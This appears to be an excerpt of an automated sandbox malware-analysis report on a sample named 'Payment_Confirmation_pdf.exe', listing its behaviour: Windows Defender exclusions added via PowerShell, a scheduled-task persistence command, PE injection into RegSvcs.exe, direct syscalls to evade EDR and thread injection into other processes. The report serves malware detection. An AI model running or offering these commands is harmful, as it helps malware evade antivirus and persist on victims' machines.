Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]	10_2_01428BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144EBFC mov eax, dword ptr fs:[00000030h]	10_2_0144EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014ACBF0 mov eax, dword ptr fs:[00000030h]	10_2_014ACBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430BBE mov eax, dword ptr fs:[00000030h]	10_2_01430BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430BBE mov eax, dword ptr fs:[00000030h]	10_2_01430BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426A50 mov eax, dword ptr fs:[00000030h]	10_2_01426A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430A5B mov eax, dword ptr fs:[00000030h]	10_2_01430A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430A5B mov eax, dword ptr fs:[00000030h]	10_2_01430A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]	10_2_0145CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]	10_2_0145CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145CA6F mov eax, dword ptr fs:[00000030h]	10_2_0145CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149CA72 mov eax, dword ptr fs:[00000030h]	10_2_0149CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149CA72 mov eax, dword ptr fs:[00000030h]	10_2_0149CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014ACA11 mov eax, dword ptr fs:[00000030h]	10_2_014ACA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145CA24 mov eax, dword ptr fs:[00000030h]	10_2_0145CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144EA2E mov eax, dword ptr fs:[00000030h]	10_2_0144EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01444A35 mov eax, dword ptr fs:[00000030h]	10_2_01444A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01444A35 mov eax, dword ptr fs:[00000030h]	10_2_01444A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145CA38 mov eax, dword ptr fs:[00000030h]	10_2_0145CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]	10_2_01476ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]	10_2_01476ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01476ACC mov eax, dword ptr fs:[00000030h]	10_2_01476ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420AD0 mov eax, dword ptr fs:[00000030h]	10_2_01420AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01454AD0 mov eax, dword ptr fs:[00000030h]	10_2_01454AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01454AD0 mov eax, dword ptr fs:[00000030h]	10_2_01454AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145AAEE mov eax, dword ptr fs:[00000030h]	10_2_0145AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145AAEE mov eax, dword ptr fs:[00000030h]	10_2_0145AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80 mov eax, dword ptr fs:[00000030h]	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4A80 mov eax, dword ptr fs:[00000030h]	10_2_014F4A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01458A90 mov edx, dword ptr fs:[00000030h]	10_2_01458A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428AA0 mov eax, dword ptr fs:[00000030h]	10_2_01428AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428AA0 mov eax, dword ptr fs:[00000030h]	10_2_01428AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01476AA4 mov eax, dword ptr fs:[00000030h]	10_2_01476AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]	10_2_01420D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]	10_2_01420D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420D59 mov eax, dword ptr fs:[00000030h]	10_2_01420D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]	10_2_01428D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]	10_2_01428D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]	10_2_01428D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]	10_2_01428D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428D59 mov eax, dword ptr fs:[00000030h]	10_2_01428D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B8D6B mov eax, dword ptr fs:[00000030h]	10_2_014B8D6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]	10_2_0143AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]	10_2_0143AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143AD00 mov eax, dword ptr fs:[00000030h]	10_2_0143AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]	10_2_01416D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]	10_2_01416D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01416D10 mov eax, dword ptr fs:[00000030h]	10_2_01416D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01454D1D mov eax, dword ptr fs:[00000030h]	10_2_01454D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D8D10 mov eax, dword ptr fs:[00000030h]	10_2_014D8D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D8D10 mov eax, dword ptr fs:[00000030h]	10_2_014D8D10

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtUnmapViewOfSection: Direct from: 0x77762D3C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtOpenKeyEx: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQueryValueKey: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtSetInformationThread: Direct from: 0x77762ECC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread register set: target process: 1180

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread APC queued: target process: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 87C008	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2561907047.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000000.1573232445.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2562949331.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
